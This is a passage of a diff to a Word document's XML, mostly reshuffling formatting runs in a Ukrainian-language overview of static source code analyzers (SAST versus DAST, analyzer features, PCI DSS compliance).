+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -19611,9 +23688,13 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -19621,9 +23702,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Класифікація</w:t>
-      </w:r>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19632,63 +23713,10 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>аналізаторів</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>вихідного</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>коду</w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Класифікація аналізаторів вихідного коду</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19711,8 +23739,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Аналізатори</w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Аналізатори вихідного коду - клас </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19722,6 +23751,16 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>програмних</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -19732,7 +23771,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>вихідного</w:t>
+        <w:t>продуктів</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19742,6 +23781,26 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>створених</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -19752,7 +23811,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>коду</w:t>
+        <w:t>для</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19762,7 +23821,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> - </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19772,7 +23831,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>клас</w:t>
+        <w:t>виявлення</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19792,6 +23851,66 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>запобігання</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>експлуатації</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t>програмних</w:t>
       </w:r>
       <w:r>
@@ -19812,178 +23931,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>продуктів</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>створених</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>для</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>виявлення</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>і</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>запобігання</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>експлуатації</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>програмних</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">помилок у вихідних кодах. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Всі продукти, спрямовані на аналіз вихідного коду, можна умовно розділити на три типи: </w:t>
+        <w:t xml:space="preserve">помилок у вихідних кодах. Всі продукти, спрямовані на аналіз вихідного коду, можна умовно розділити на три типи: </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20217,7 +24165,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
+        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20270,8 +24229,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори </w:t>
-      </w:r>
+        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20280,8 +24240,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідповідності та можливість виконання вимог </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -20292,7 +24262,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>в</w:t>
+        <w:t>р</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -20303,7 +24273,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідповідності та можливість виконання вимог </w:t>
+        <w:t xml:space="preserve">ізних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -20314,7 +24284,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>р</w:t>
+        <w:t>св</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -20325,41 +24295,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ізних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>св</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина ан</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>алізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
+        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -20734,7 +24670,19 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
+        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраст</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>руктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -22991,29 +26939,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
